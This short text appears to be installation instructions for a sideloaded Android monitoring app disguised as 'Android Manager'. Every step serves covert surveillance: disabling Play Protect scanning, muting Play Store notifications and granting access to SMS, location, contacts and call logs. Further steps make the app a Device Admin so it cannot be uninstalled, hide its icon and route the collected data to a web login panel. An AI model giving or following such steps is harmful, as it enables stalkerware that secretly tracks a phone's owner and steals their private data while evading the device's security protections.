Open Play Store → Tap Profile Icon → Play Protect → Settings (Gear Icon) → Turn OFF "Scan apps with Play Protect".
Go to phone Settings → Apps → Google Play Store → Notifications → Turn OFF all notifications.
Open the downloaded file. Tap "Install Anyway" if prompted. Open the app, enter your Name and Email, then tap Register.
Tap "Allow" or "While using the app" for every request (SMS, Location, Contacts, Call Logs, etc.).
A screen will appear asking to Activate Device Admin. Tap Activate — this locks the app so it cannot be uninstalled.
Phone Settings → Apps → Android Manager → Tap 3 dots (top right) → "Allow restricted settings".
Once the app icon disappears from the phone, return here, click "GO TO LOGIN", and sign in with the email of the account you created in the app.
